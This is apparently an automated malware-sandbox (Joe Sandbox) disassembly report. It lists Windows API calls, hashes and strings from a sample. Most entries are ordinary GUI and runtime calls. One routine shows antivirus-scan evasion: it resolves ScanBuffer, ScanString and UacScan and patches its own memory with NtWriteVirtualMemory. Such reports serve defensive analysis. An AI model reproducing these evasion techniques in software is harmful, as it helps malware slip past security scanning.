                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,?), ref: 02A06EB9
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 02A06EC4
                                                                                                                                            • GetWindowLongW.USER32(?,000000F4), ref: 02A06ED6
                                                                                                                                            • SetWindowLongW.USER32(?,000000F4,?), ref: 02A06EE9
                                                                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 02A06F02
                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02A06F0D
                                                                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 02A06F1F
                                                                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 02A06F32
                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 02A06F49
                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 02A06F60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$Prop$Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1693715928-0
                                                                                                                                            • Opcode ID: 4484e1ed26e98f7a543c04b64dee814bb3a121aa7731b6214291546145037175
                                                                                                                                            • Instruction ID: 08e7302fcebdf37811519e02daa89f1eb7aef081e099df578b0141f0cbae0e7e
                                                                                                                                            • Opcode Fuzzy Hash: 4484e1ed26e98f7a543c04b64dee814bb3a121aa7731b6214291546145037175
                                                                                                                                            • Instruction Fuzzy Hash: AC31ABB9504258BBDF10DF98EC84EEA77EDAB08368F108A51F914CB2D1CB34D9509B64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,02A6A350,02A2B464,OpenSession,02A6A350,02A2B464,ScanBuffer,02A6A350,02A2B464,00000000,02A2B44C), ref: 02A2AF47
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02A2AF4D
                                                                                                                                              • Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
                                                                                                                                              • Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
                                                                                                                                              • Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
                                                                                                                                              • Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
                                                                                                                                              • Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
                                                                                                                                              • Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCurrentHandleLibraryMemoryModuleProcProcessVirtual$FreeLoadProtectWrite
                                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                            • API String ID: 327143009-4174081549
                                                                                                                                            • Opcode ID: 35d3a0a61cfae25c4601ed5ef9c11f3c4981afd9c4d79e05ad805ca147c79b54
                                                                                                                                            • Instruction ID: 9c9d8ae221d2efaad9978aecdc76ce4df92cca8852cc0f65cb9b898382df98d3
                                                                                                                                            • Opcode Fuzzy Hash: 35d3a0a61cfae25c4601ed5ef9c11f3c4981afd9c4d79e05ad805ca147c79b54
                                                                                                                                            • Instruction Fuzzy Hash: 74F12131A011199BDF05EBA8C980FDEB3BABF95304F51D4A6E009EB214DF30AE459F61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RectVisible.GDI32(00000000,?), ref: 02A0FBA4
                                                                                                                                            • SaveDC.GDI32(00000000), ref: 02A0FBC7
                                                                                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 02A0FC07
                                                                                                                                            • RestoreDC.GDI32(00000000,00000000), ref: 02A0FC33
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$ClipIntersectRestoreSaveVisible
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1976014923-0
                                                                                                                                            • Opcode ID: d3b12f71f14c272d8587200dffbf1fb55496d314562c76b02610ad92729efd99
                                                                                                                                            • Instruction ID: 53d49966e75f90398419edbf7e5f08ae6f90c3681c6e09a48b1e67e477255877
                                                                                                                                            • Opcode Fuzzy Hash: d3b12f71f14c272d8587200dffbf1fb55496d314562c76b02610ad92729efd99
                                                                                                                                            • Instruction Fuzzy Hash: 7A91F674A002489FDB15DFA9D4C5FAEBBF9AF49304F1440A5EA44EB292DB35E980CF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 02A1F143
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 02A1F161
                                                                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02A1F16E
                                                                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02A1F17B
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02A1F188
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 02A1F195
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 02A1F1A2
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 02A1F1AF
                                                                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 02A1F1CD
                                                                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 02A1F1E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3985193851-0
                                                                                                                                            • Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                                                            • Instruction ID: f576184b1887e88ed115ed14e80c28c31212d060c6698834955e598b34f57257
                                                                                                                                            • Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                                                            • Instruction Fuzzy Hash: 2E210E70384344BEE721DB38CC8DF997ADE5B04B18F0580A0B648AF6D2CBB5FA549B14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            • The unexpected small block leaks are:, xrefs: 029D27A3
                                                                                                                                            • bytes: , xrefs: 029D27F9
                                                                                                                                            • , xrefs: 029D28B0
                                                                                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 029D28E5
                                                                                                                                            • An unexpected memory leak has occurred. , xrefs: 029D272C
                                                                                                                                            • Unexpected Memory Leak, xrefs: 029D295C
                                                                                                                                            • 7, xrefs: 029D273D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                            • API String ID: 0-2723507874
                                                                                                                                            • Opcode ID: 624261b16ae4812c0a60a852f9b1c8376e572e21e11ac1affe17876ff287290c
                                                                                                                                            • Instruction ID: a8570c0fb3a1d76b1e4008abbe46f040da56cc1fbad740700a728ab3ce2232b1
                                                                                                                                            • Opcode Fuzzy Hash: 624261b16ae4812c0a60a852f9b1c8376e572e21e11ac1affe17876ff287290c
                                                                                                                                            • Instruction Fuzzy Hash: B471D330E042988FDF21AB2CCC84BD9BAE9EB49714F1080E5E949DB287DB7589C5DF51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0A1AB
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0A1C5
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0A1F3
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0A209
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0A241
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0A259
                                                                                                                                              • Part of subcall function 029F24FC: MulDiv.KERNEL32(00000000,00000048,?), ref: 029F250D
                                                                                                                                            • MulDiv.KERNEL32(?), ref: 02A0A2B0
                                                                                                                                            • MulDiv.KERNEL32(?), ref: 02A0A2DA
                                                                                                                                            • MulDiv.KERNEL32(00000000), ref: 02A0A300
                                                                                                                                              • Part of subcall function 029F2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 029F2525
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 277b0248ad7e4b5cab525bc8e0c92c1d3a78081a182e4f184a9beee4dc6d2d2d
                                                                                                                                            • Instruction ID: b5327027ea430d8beb2b5db6a363401351153c4ac7f802b3b342a81decf3baed
                                                                                                                                            • Opcode Fuzzy Hash: 277b0248ad7e4b5cab525bc8e0c92c1d3a78081a182e4f184a9beee4dc6d2d2d
                                                                                                                                            • Instruction Fuzzy Hash: C7512E75648750AFC320DB69D8C4B6AB7FDAF49704F04881DAAD6C7292CB36E844CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029EE97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 029EE99A
                                                                                                                                            • GetClassInfoA.USER32(029D0000,02A22730,?), ref: 02A22AF3
                                                                                                                                            • RegisterClassA.USER32(02A3B650), ref: 02A22B0B
                                                                                                                                              • Part of subcall function 029D669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 029D66CE
                                                                                                                                            • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 02A22BA7
                                                                                                                                            • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 02A22BC9
                                                                                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 02A22BDC
                                                                                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22BE7
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22BF6
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22C03
                                                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22C1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2103932818-0
                                                                                                                                            • Opcode ID: 4f32a3717af56b43678262a56d1df8ca4cd770c46af9a99c067370d62db37fd4
                                                                                                                                            • Instruction ID: a2a8fbb63df99fa2b4c873a0b42f040a9cded0d13d4bcb1d4e2af54e7b492060
                                                                                                                                            • Opcode Fuzzy Hash: 4f32a3717af56b43678262a56d1df8ca4cd770c46af9a99c067370d62db37fd4
                                                                                                                                            • Instruction Fuzzy Hash: 52416E70A40240AFEB10EFB8DC85FA633AEAB45704F409961FE40DB292DF75E8549F24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDesktopWindow.USER32 ref: 02A0B12B
                                                                                                                                            • GetDCEx.USER32(?,00000000,00000402), ref: 02A0B13E
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02A0B161
                                                                                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 02A0B187
                                                                                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 02A0B1A9
                                                                                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 02A0B1C8
                                                                                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 02A0B1E2
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 02A0B1EF
                                                                                                                                            • ReleaseDC.USER32(?,?), ref: 02A0B209
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1187665388-0
                                                                                                                                            • Opcode ID: b3e44c699bf85223c26e7b07c490003794e9e9027a344135f2ce5dd26f8fb7ec
                                                                                                                                            • Instruction ID: 4175fedfcb4631a9582a491c396d607c89eadb72795d25236651961cbd7d387b
                                                                                                                                            • Opcode Fuzzy Hash: b3e44c699bf85223c26e7b07c490003794e9e9027a344135f2ce5dd26f8fb7ec
                                                                                                                                            • Instruction Fuzzy Hash: 9131F5B6A00219AFDB40DEEDDD89EEFBBBDFF49704B008465B504E7240D675AD048BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,029DD297,?,?,00000000,00000000), ref: 029DD002
                                                                                                                                              • Part of subcall function 029DB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                                            • Opcode ID: 999e11c65f1ca82d1ec6763b654ec0ab971ecbfd451082e5c0b5f32a7aa36174
                                                                                                                                            • Instruction ID: 686fbd2bfb6767f640f3c25d613182881018e11b7562373d261fdc7560ebf0a5
                                                                                                                                            • Opcode Fuzzy Hash: 999e11c65f1ca82d1ec6763b654ec0ab971ecbfd451082e5c0b5f32a7aa36174
                                                                                                                                            • Instruction Fuzzy Hash: 4A611F35B402499BDB00EBE8D890B9F77BBEBC9304F55D835E101AB645CB34D90ABB61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetClassInfoA.USER32(?,?,?), ref: 02A0E650
                                                                                                                                            • UnregisterClassA.USER32(?,?), ref: 02A0E678
                                                                                                                                            • RegisterClassA.USER32(?), ref: 02A0E68E
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02A0E6CA
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F4), ref: 02A0E6DF
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 02A0E6F2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 717780171-2766056989
                                                                                                                                            • Opcode ID: 3ee2fb76e86823190d5088681ed9c63e02e46b2593e830fb0d3837634192bcc1
                                                                                                                                            • Instruction ID: fda7fd44990db133a1e602608c39fff4a7c993fdacd2d251b697a0276e9eebbc
                                                                                                                                            • Opcode Fuzzy Hash: 3ee2fb76e86823190d5088681ed9c63e02e46b2593e830fb0d3837634192bcc1
                                                                                                                                            • Instruction Fuzzy Hash: 49518030A003548FEB20EBA8DDC4BDEB7EAAF45308F4089A9E555E72D1DB30A945DF10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetMonitorInfoA.USER32(?,?), ref: 029FB001
                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 029FB028
                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 029FB03D
                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 029FB048
                                                                                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 029FB072
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                            • API String ID: 1539801207-1633989206
                                                                                                                                            • Opcode ID: 84f3bcb1f5dd06b4aedb5ce2b57e4359ffe2ce35a88eb7937d782a1381e130b0
                                                                                                                                            • Instruction ID: 9f2971955cdcdb68c04040bcd87105d1eb28d77570c5d02af3ea414ef5d3f1bb
                                                                                                                                            • Opcode Fuzzy Hash: 84f3bcb1f5dd06b4aedb5ce2b57e4359ffe2ce35a88eb7937d782a1381e130b0
                                                                                                                                            • Instruction Fuzzy Hash: B9113332A40701AFD3A0CF64D8487A7B7F9FB08314F044929EE6597640DBB1E414CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?,02A697C8,?,?,02A3A7AC,029D68FD,02A39751), ref: 029D4641
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?,02A697C8,?,?,02A3A7AC,029D68FD,02A39751), ref: 029D4647
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,029D4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?,02A697C8), ref: 029D465C
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,029D4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?), ref: 029D4662
                                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029D4680
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                            • Opcode ID: f1021ccc4bc052a18d7e2771d42fc6a8d03cb253657e211fc72bda996077f9b4
                                                                                                                                            • Instruction ID: 8e03337de39f34fc7bf04fb823c8857d4b338f9002855007d53aaf61733c97b6
                                                                                                                                            • Opcode Fuzzy Hash: f1021ccc4bc052a18d7e2771d42fc6a8d03cb253657e211fc72bda996077f9b4
                                                                                                                                            • Instruction Fuzzy Hash: C1F02456A90380B4FB20A360AC5DF99635C9385F28F54DB04F3A5D80C28FB084C5AF22
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 02A25F2F
                                                                                                                                            • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 02A25FD0
                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 02A2601D
                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 02A26025
                                                                                                                                            • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 02A2604A
                                                                                                                                              • Part of subcall function 02A25EA8: ImageList_GetBkColor.COMCTL32(00000000,?,02A25F09,00000000,?), ref: 02A25EBE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
